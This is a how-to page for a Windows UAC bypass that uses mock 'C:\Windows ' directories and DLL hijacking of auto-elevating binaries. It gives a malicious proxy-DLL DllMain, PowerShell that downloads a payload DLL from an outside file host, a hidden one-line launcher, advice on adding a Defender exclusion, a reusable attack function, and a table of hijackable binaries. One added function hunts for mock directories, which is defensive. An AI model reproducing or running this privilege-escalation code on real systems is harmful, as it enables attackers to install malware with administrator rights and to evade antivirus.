PowerShell UAC bypass
Originally discovered by Daniel Gebert
Deployment
First, edit the PowerShell script below so it downloads your malicious DLL from Filebin (or any host you control).
To create that DLL easily, I would take this proxy DLL template and replace its DllMain with the code below, so the real exports are still forwarded and the host process does not crash:
dllmain.c
    #include "pch.h"
    #include "prxdll.h"     // proxy-DLL template: prx_attach()/prx_detach() forward the real exports
    #include <windows.h>

    BOOL APIENTRY DllMain(
        const HINSTANCE instance,
        const DWORD reason,
        const PVOID reserved)
    {
        switch (reason) {
        case DLL_PROCESS_ATTACH:
            // We are loaded inside the auto-elevated host, so the child PowerShell is already
            // high integrity and the inner -Verb runas starts without a prompt.
            // The payload sits inside single quotes: any single quote in it must be doubled.
            WinExec("powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden "
                    "-Command \"Start-Process -Verb runas powershell "
                    "'-NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command YOURPOWERSHELLCOMMANDHERE'\"",
                    SW_SHOWNORMAL);
            DisableThreadLibraryCalls(instance);
            return prx_attach(instance);   // keep forwarding exports so the host keeps running
        case DLL_PROCESS_DETACH:
            prx_detach(reserved);
            break;
        }
        return TRUE;
    }
This runs your PowerShell command as administrator (high integrity) the moment the DLL is loaded into the auto-elevated process.
Next we need an auto-elevating application to hijack. I prefer WinSAT.exe because it shows no GUI when run. Other auto-elevate applications, and the DLL name each one loads, are listed at the end of this page.
Now edit the PowerShell source:
    # The \\?\ prefix skips Win32 path normalisation, which would otherwise drop the trailing space
    New-Item '\\?\C:\Windows \System32' -ItemType Directory
    Set-Location -Path '\\?\C:\Windows \System32'
    # Copy the auto-elevating binary next to where our DLL will land
    Copy-Item 'C:\Windows\System32\WinSAT.exe' 'C:\Windows \System32\WinSAT.exe'
    # Download the proxy DLL into the current (mock) directory
    Invoke-WebRequest -Uri 'https://filebin.net/bajzrgruy6h83o4n/version.dll' -OutFile 'version.dll'
    # Launch from the mock path: elevated without a prompt, and it loads our version.dll first
    Start-Process -FilePath 'C:\Windows \System32\WinSAT.exe'
    Start-Sleep -Seconds 1
    # Remove the mock tree; a leftover "Windows " folder is an obvious indicator
    Remove-Item '\\?\C:\Windows \' -Force -Recurse
Modifications to make:
Build your DLL with Visual Studio and upload it to Filebin. My DLL adds a Windows Defender exclusion so the TEMP directory is not scanned.
Replace the Invoke-WebRequest -Uri with your own link. If you picked a different auto-elevate binary, change the Copy-Item source and the Start-Process path to match, and name the DLL as the table at the end of this page says. The Start-Sleep gives the binary time to load the DLL; if Remove-Item fails because the process still holds the files, lengthen it.
For the final step, join the lines with semicolons into a single -Command string so it can be launched from a batch file:
    powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "Yourcodehere"
And boom! That one command runs your payload with UAC bypassed.
Remember, you can program this into most high-level languages, since all you need to do is execute one system command.
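The whole procedure above as one parameterised script, added here as an example rather than taken from the original page or from Daniel Gebert's write-up. It assumes the proxy DLL is already built and available locally at -DllPath (the page downloads it from Filebin instead), and that the target is WinSAT.exe with version.dll as in the table at the end of the page. ConvertTo-OneLiner is a helper introduced here to produce the semicolon-joined -Command string the page describes; the URL in the sample steps is a placeholder.

```powershell
# Added example, not the original page's script.
function Invoke-MockDirectoryBypass {
    [CmdletBinding()]
    param(
        # Local path to your compiled proxy DLL (assumption: built beforehand).
        [Parameter(Mandatory)] [string] $DllPath,
        # Auto-elevating binary to copy; $DllName must match the table entry for it.
        [string] $Target  = 'WinSAT.exe',
        [string] $DllName = 'version.dll',
        # Seconds to wait for the hijacked process before cleanup.
        [int]    $Wait    = 3
    )

    # \\?\ turns off Win32 path normalisation, which is what lets a folder named
    # "Windows " (trailing space) exist beside the real one. Same forms as the page.
    $mockRoot = '\\?\C:\Windows \'
    $mockSys  = '\\?\C:\Windows \System32'
    $mockExe  = "C:\Windows \System32\$Target"
    $realExe  = Join-Path $env:SystemRoot "System32\$Target"

    try {
        New-Item -Path $mockSys -ItemType Directory -Force | Out-Null
        Copy-Item -Path $realExe -Destination $mockExe
        Copy-Item -Path $DllPath -Destination "C:\Windows \System32\$DllName"

        # Launched from the mock path: the trusted-directory check sees
        # C:\Windows\System32 once the space is stripped, but the loader
        # searches the mock folder first and picks up our DLL.
        $proc = Start-Process -FilePath $mockExe -PassThru
        $proc | Wait-Process -Timeout $Wait -ErrorAction SilentlyContinue
    }
    finally {
        # Always remove the mock tree; this fails if the target still holds the
        # files, so raise -Wait (or kill the target from the elevated payload).
        Remove-Item -Path $mockRoot -Recurse -Force -ErrorAction SilentlyContinue
    }
}

function ConvertTo-OneLiner {
    param([Parameter(Mandatory)] [string] $ScriptText)
    # Flatten a multi-line script into the single -Command string the page
    # describes: drop blank and comment-only lines, join with semicolons, and
    # escape double quotes for the powershell.exe command line.
    $stmts = $ScriptText -split "`r?`n" |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ -and -not $_.StartsWith('#') }
    $body = ($stmts -join '; ') -replace '"', '\"'
    "powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command `"$body`""
}

# Sample steps (constructed; the URL is a placeholder for your own host).
$steps = @'
New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
Copy-Item 'C:\Windows\System32\WinSAT.exe' 'C:\Windows \System32\WinSAT.exe'
Invoke-WebRequest -Uri 'https://YOURHOST/version.dll' -OutFile 'version.dll'
Start-Process -FilePath 'C:\Windows \System32\WinSAT.exe'
Start-Sleep -Seconds 1
Remove-Item '\\?\C:\Windows \' -Force -Recurse
'@
ConvertTo-OneLiner -ScriptText $steps
```

Invoke-MockDirectoryBypass -DllPath C:\build\version.dll does the same work as the page's script but cleans up even when a step throws; the one-liner printed by ConvertTo-OneLiner is what you paste into the batch file.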
Explanations
What Is UAC
Microsoft introduced UAC (User Account Control) with Windows Vista and Windows Server 2008.
In short, UAC aims to improve the security of Microsoft Windows by giving programs standard user privileges until an administrator authorizes an increase, or elevation, of permissions. (Wikipedia)
DLL Hijacking
DLL hijacking means a program will load and execute a malicious DLL contained in the same folder as a data file opened by these programs (Wikipedia). More generally, an executable that loads a DLL by name lets the loader search the executable's own directory before System32, so a same-named DLL placed beside it wins. That is why the table at the end of this page uses version.dll and profapi.dll, which are not served from the KnownDLLs list and so are subject to that search order.
Mock directories
Here's a description taken from Daniel's blog:
Mock directories are folders with a trailing space. For example
C:\Windows \System32
See the space " " between "Windows" and "\System32".
Why it works: when Windows checks whether an auto-elevating binary lives in a trusted directory, it normalises the path and drops the trailing space, so the copy in the mock folder passes as C:\Windows\System32\WinSAT.exe and is elevated without a prompt. The process is still started from the mock folder, where our DLL sits beside it. The \\?\ prefix is needed to create (and later delete) the folder because it tells the API to skip that normalisation.
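The defensive check that follows from the explanation above, added here as an example and not part of the original page: a hunt for mock directories (names ending in a space or a period) that also lists the PE files inside them, since that is where a hijack DLL and a copied auto-elevate binary would be. It assumes the account running it can enumerate the given roots; Find-MockDirectory and its parameters are names chosen for this example.

```powershell
# Added example, not from the original page.
function Find-MockDirectory {
    [CmdletBinding()]
    param(
        # Roots to scan; the bypass targets C:\ so a mock "Windows " sits at depth 0.
        [string[]] $Root  = @('C:\'),
        [int]      $Depth = 2
    )
    foreach ($r in $Root) {
        Get-ChildItem -LiteralPath $r -Directory -Recurse -Depth $Depth -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -match '[ .]$' } |
            ForEach-Object {
                # Re-open the folder through \\?\ so the trailing space survives; the plain
                # path would be normalised to the real C:\Windows and we would look there.
                $literal = '\\?\' + $_.FullName
                $pe = Get-ChildItem -LiteralPath $literal -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue
                [pscustomobject]@{
                    Path     = $_.FullName
                    Created  = $_.CreationTime
                    Payloads = @($pe | ForEach-Object { $_.FullName })
                }
            }
    }
}

# Usage: any hit whose Payloads list pairs a signed Windows binary with a DLL named
# in the auto-elevate table (version.dll, profapi.dll) is the bypass staged or in progress.
Find-MockDirectory -Root 'C:\' -Depth 1 | Format-List
```

The regex also catches trailing periods, which Windows strips the same way; scanning deeper than one or two levels on C:\ is slow, so run the shallow scan on a schedule and reserve deep scans for incident response.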
Auto-elevate applications
Executable | DLL | Comment
--- | --- | ---
ComputerDefaults.exe | profapi.dll | Can also bypass UAC using other methods.
EASPolicyManagerBrokerHost.exe | profapi.dll |
fodhelper.exe | profapi.dll | Opens Settings; can also bypass UAC using other methods.
FXSUNATD.exe | version.dll |
msconfig.exe | version.dll | Can also bypass UAC using other methods.
OptionalFeatures.exe | profapi.dll | Opens Windows Optional Features.
sdclt.exe | profapi.dll | Can also bypass UAC using other methods; opens Windows Backup.
ServerManager.exe | profapi.dll | ServerManager.exe is not present by default.
systemreset.exe | version.dll |
sysprep.exe | version.dll | Creates a sub folder. The sysprep process has to be killed directly after the UAC bypass, otherwise sysprep is executed!
SystemSettingsAdminFlows.exe | version.dll |
WinSAT.exe | version.dll |
WSReset.exe | profapi.dll | Opens the Windows Store.